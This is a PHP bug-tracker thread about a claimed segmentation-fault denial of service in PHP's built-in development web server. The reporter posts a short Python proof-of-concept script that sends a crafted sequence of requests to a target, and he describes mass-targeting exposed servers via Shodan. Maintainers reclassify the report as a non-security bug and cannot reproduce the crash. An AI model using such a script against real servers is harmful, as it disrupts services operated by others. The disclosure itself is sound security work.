php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #78047 [DoS] Segmentation fault through HTTP Requests
Submitted: 2019-05-21 11:45 UTC Modified: 2019-05-23 13:30 UTC
Votes:10
Avg. Score:4.3 ± 1.2
Reproduced:0 of 0 (0.0%)
From: michele dot cisternino at protonmail dot com Assigned:
Status: Open Package: Built-in web server
PHP Version: 7.3Git-2019-05-21 (snap) OS: Linux
Private report: No CVE-ID: None
Have you experienced this issue?
Rate the importance of this bug to you:

 [2019-05-21 11:45 UTC] michele dot cisternino at protonmail dot com
Description:
------------
Hi,

I found a vulnerability while I was testing the PHP built-in web server.
The vulnerability could be exploited by an attacker to crash the server causing a segmentation fault.

I think the vulnerability resides in the way the server handle the HTTP requests.

The steps to reproduce to trigger the segmentation fault are the following:

$ apt install php
$ mkdir server
$ cd server
$ touch file.php
$ php -S 0.0.0.0:80
$ python exploit.py 127.0.0.1 #But could be a remote server as well

You can find the exploit in the "Test script" section.

Further investigations of the issue could lead an attacker to exploit the memory corruption in the server to get a reverse shell (eg. Buffer overflow).
Anyway, with the actual exploit an attacker could already DoS the server.

Test script:
---------------
import sys
import requests

if len(sys.argv) < 2:
    print "[!] Usage: %s TARGET" % sys.argv[0]
    exit()

target = sys.argv[1].strip()

if not target.startswith("http://") and not target.startswith("https://"):
    target = "http://" + target

if not target.endswith("/"):
    target = target + "/"

filenames = ["", "file.php", "test.php", ""]

print "[*] Sending requests to %s." % target
try:
    for filename in filenames:
        requests.get(target + filename)
    print "The exploit didn't worked."
except requests.exceptions.ConnectionError:
    print "The exploit worked!"

Expected result:
----------------
The server crash with "Segmentation fault" error.


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2019-05-21 15:18 UTC] michele dot cisternino at protonmail dot com
The exploit consists in sending HTTP requests in the following order:

1 - Request the base URL
2 - Request a valid file on the server
3 - Request a non-existent file on the server
4 - Request the base URL
 [2019-05-21 17:46 UTC] cmb@php.net
-Type: Security +Type: Bug
 [2019-05-21 17:46 UTC] cmb@php.net
> The vulnerability could be exploited by an attacker […]

No, it can not, because the built-in webserver is for
*development* purposes only.
 [2019-05-21 18:35 UTC] michele dot cisternino at protonmail dot com
Sorry for the late reply.

Yes, the server is usually used for testing purposes, but it can be esposed to the internet as well.
You can launch a simple query on Shodan to find multiple instances of the built-in PHP server exposed.

An attacker could write a script that launch a request to the Shodan's API, get a list of vulnerable instances and DoS them all iteratively.

Moreover, In my daily pentest-job, I found this kind of Server not exposed to the internet, but used internally by the companies.
An attacker, thanks to the exploit I wrote, could cause a continuous DoS.

Moreover, as I already said, the vulnerability could be further investigated to upgrade it to an RCE.

I hope you understand the criticality of the vulnerability.
 [2019-05-22 07:40 UTC] cmb@php.net
To clarify: the built-in web server *can* of course be connected
to a public network; it is, however, not supposed to[1].  Therefore
we do not consider any issues related to the built-in web server
to be security issues.

[1] <https://www.php.net/manual/en/features.commandline.webserver.php>
 [2019-05-22 07:57 UTC] michele dot cisternino at protonmail dot com
I disagree, respectfully.
A malicious user, thanks to this exploit, can crash all the public instances of the built-in server (around 2.000, in my search).

Anyway, if you don't agree, I can disclose it (you also switched the status from Private to Public), so we can see what the hacking community think about it.

Have a nice day :)
 [2019-05-22 08:12 UTC] spam2 at rhsoft dot net
> can crash all the public instances of the built-in server

hopefully and then the people maybe read the first red box at https://www.php.net/manual/en/features.commandline.webserver.php
 [2019-05-23 09:25 UTC] nikic@php.net
I can't reproduce this on a 7.3 nts build. Also no warnings when running under valgrind.
 [2019-05-23 13:30 UTC] michele dot cisternino at protonmail dot com
It doesn't matter anymore :')
It's just a bug, rofl.
 
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Sun Jun 16 21:01:28 2019 UTC